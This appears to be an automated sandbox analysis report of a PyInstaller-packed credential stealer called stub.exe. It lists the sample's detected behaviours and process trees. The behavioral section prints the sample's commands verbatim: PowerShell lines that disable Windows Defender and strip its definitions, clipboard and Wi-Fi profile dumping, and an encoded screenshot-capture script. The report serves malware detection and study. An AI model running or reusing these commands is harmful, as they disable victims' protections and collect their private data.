Malware Analysis Report

2025-03-15 04:33

Sample ID 241026-ajb58sxgqm
Target stub.exe
SHA256 a39a334b04b7c0559cf094b51716343c85d6b6b801be2b6776d75893f564db1a
Tags
pyinstaller collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

a39a334b04b7c0559cf094b51716343c85d6b6b801be2b6776d75893f564db1a

Threat Level: Likely malicious

The file stub.exe was found to be: Likely malicious.

Malicious Activity Summary

pyinstaller collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer

Command and Scripting Interpreter: PowerShell

Unsecured Credentials: Credentials In Files

Reads user/profile data of web browsers

Loads dropped DLL

Clipboard Data

Obfuscated Files or Information: Command Obfuscation

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Enumerates processes with tasklist

Event Triggered Execution: Netsh Helper DLL

Unsigned PE

Detects Pyinstaller

Browser Information Discovery

System Network Configuration Discovery: Wi-Fi Discovery

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Detects videocard installed

Gathers system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-26 00:14

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-26 00:14

Reported

2024-10-26 00:16

Platform

win7-20240903-en

Max time kernel

122s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\stub.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\stub.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2420 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Users\Admin\AppData\Local\Temp\stub.exe
PID 2420 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Users\Admin\AppData\Local\Temp\stub.exe
PID 2420 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Users\Admin\AppData\Local\Temp\stub.exe

Processes

C:\Users\Admin\AppData\Local\Temp\stub.exe

"C:\Users\Admin\AppData\Local\Temp\stub.exe"

C:\Users\Admin\AppData\Local\Temp\stub.exe

"C:\Users\Admin\AppData\Local\Temp\stub.exe"

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\_MEI24202\python310.dll

MD5 63a1fa9259a35eaeac04174cecb90048
SHA1 0dc0c91bcd6f69b80dcdd7e4020365dd7853885a
SHA256 14b06796f288bc6599e458fb23a944ab0c843e9868058f02a91d4606533505ed
SHA512 896caa053f48b1e4102e0f41a7d13d932a746eea69a894ae564ef5a84ef50890514deca6496e915aae40a500955220dbc1b1016fe0b8bcdde0ad81b2917dea8b

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-26 00:14

Reported

2024-10-26 00:16

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\stub.exe"

Signatures

Clipboard Data

collection
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Browser Information Discovery

discovery

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 624 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Users\Admin\AppData\Local\Temp\stub.exe
PID 624 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Users\Admin\AppData\Local\Temp\stub.exe
PID 824 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 968 wrote to memory of 4848 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 968 wrote to memory of 4848 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 1152 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 1152 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 824 wrote to memory of 4084 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 4084 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 3384 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 3384 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 1940 wrote to memory of 1824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1940 wrote to memory of 1824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4084 wrote to memory of 4280 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4084 wrote to memory of 4280 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 824 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 824 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 824 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 3384 wrote to memory of 4020 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3384 wrote to memory of 4020 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3208 wrote to memory of 1256 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3208 wrote to memory of 1256 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4484 wrote to memory of 3356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4484 wrote to memory of 3356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4012 wrote to memory of 1932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 4012 wrote to memory of 1932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 4992 wrote to memory of 3580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4992 wrote to memory of 3580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2608 wrote to memory of 4604 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2608 wrote to memory of 4604 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5056 wrote to memory of 1892 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 5056 wrote to memory of 1892 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 824 wrote to memory of 456 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 456 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 456 wrote to memory of 3920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 456 wrote to memory of 3920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 824 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 4208 wrote to memory of 2184 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4208 wrote to memory of 2184 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 824 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 2172 wrote to memory of 3248 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 2172 wrote to memory of 3248 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4604 wrote to memory of 4452 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4604 wrote to memory of 4452 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 824 wrote to memory of 4892 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 4892 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 4892 wrote to memory of 4828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4892 wrote to memory of 4828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com

Processes

C:\Users\Admin\AppData\Local\Temp\stub.exe

"C:\Users\Admin\AppData\Local\Temp\stub.exe"

C:\Users\Admin\AppData\Local\Temp\stub.exe

"C:\Users\Admin\AppData\Local\Temp\stub.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\stub.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\stub.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

